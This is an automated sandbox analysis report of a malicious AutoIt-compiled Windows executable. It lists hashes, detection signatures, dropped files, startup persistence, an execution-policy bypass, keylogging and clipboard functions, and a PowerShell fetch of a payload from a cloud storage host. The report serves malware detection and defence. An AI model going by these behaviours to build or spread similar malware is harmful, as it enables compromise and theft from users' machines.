Windows Analysis Report
T6l6gPxwQU.exe

Overview

General Information

Sample name: T6l6gPxwQU.exe
renamed because original name is a hash value
Original sample name: fca042b18adf613d9a2be1646663698f.exe
Analysis ID: 1528376
MD5: fca042b18adf613d9a2be1646663698f
SHA1: a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c
SHA256: 3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460
Tags: 64exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: T6l6gPxwQU.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for sample
Source: T6l6gPxwQU.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: T6l6gPxwQU.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19BC70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF6BB1A72A8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A71F4 FindFirstFileW,FindClose, 0_2_00007FF6BB1A71F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19B7C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162F50 FindFirstFileExW, 0_2_00007FF6BB162F50
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA4F8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA350
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF6BB1A6428
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF6BB1AA874
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF6BB19C7C0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00594005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00594005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_0059494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059C2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD14 FindFirstFileW,FindClose, 3_2_0059CD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_0059CD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059FA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00593CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00593CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00904005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00904005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0090494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0090CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD14 FindFirstFileW,FindClose, 10_2_0090CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00903CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00903CE2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /v1/ws2/:stream2/:small/small.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AE968 InternetQueryDataAvailable,InternetReadFile, 0_2_00007FF6BB1AE968
Source: global traffic HTTP traffic detected: GET /v1/ws2/:stream2/:small/small.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: my.cloudme.com
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB015FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1768096648.000002BB0117C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloHJ
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com/v1/ws2/:stream2/:small/small.txt
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00007FF6BB1B0D24
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00007FF6BB1B0D24
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_005A4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00914830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 10_2_00914830
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00007FF6BB1B0A6C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB121CEC GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 0_2_00007FF6BB121CEC
Potential key logger detected (key state polling based)
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 3_2_005BD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0092D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 10_2_0092D164

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: This is a third-party compiled AutoIt script. 0_2_00007FF6BB1237B0
Source: T6l6gPxwQU.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5e6fb49a-f
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@* memstr_b81c1be3-9
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19C054: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00007FF6BB19C054
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock, 0_2_00007FF6BB18D2C4
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00007FF6BB19D750
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00595778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 3_2_00595778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00905778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 10_2_00905778
Detected potential crypto function
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1BF630 0_2_00007FF6BB1BF630
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB132E30 0_2_00007FF6BB132E30
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB133C20 0_2_00007FF6BB133C20
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB13FA4F 0_2_00007FF6BB13FA4F
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CDB18 0_2_00007FF6BB1CDB18
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB15793C 0_2_00007FF6BB15793C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12B9F0 0_2_00007FF6BB12B9F0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A1A18 0_2_00007FF6BB1A1A18
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CBA0C 0_2_00007FF6BB1CBA0C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B206C 0_2_00007FF6BB1B206C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB14C130 0_2_00007FF6BB14C130
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB125F3C 0_2_00007FF6BB125F3C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12BE70 0_2_00007FF6BB12BE70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB14BEB4 0_2_00007FF6BB14BEB4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12B390 0_2_00007FF6BB12B390
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB16529C 0_2_00007FF6BB16529C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B32AC 0_2_00007FF6BB1B32AC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12183C 0_2_00007FF6BB12183C
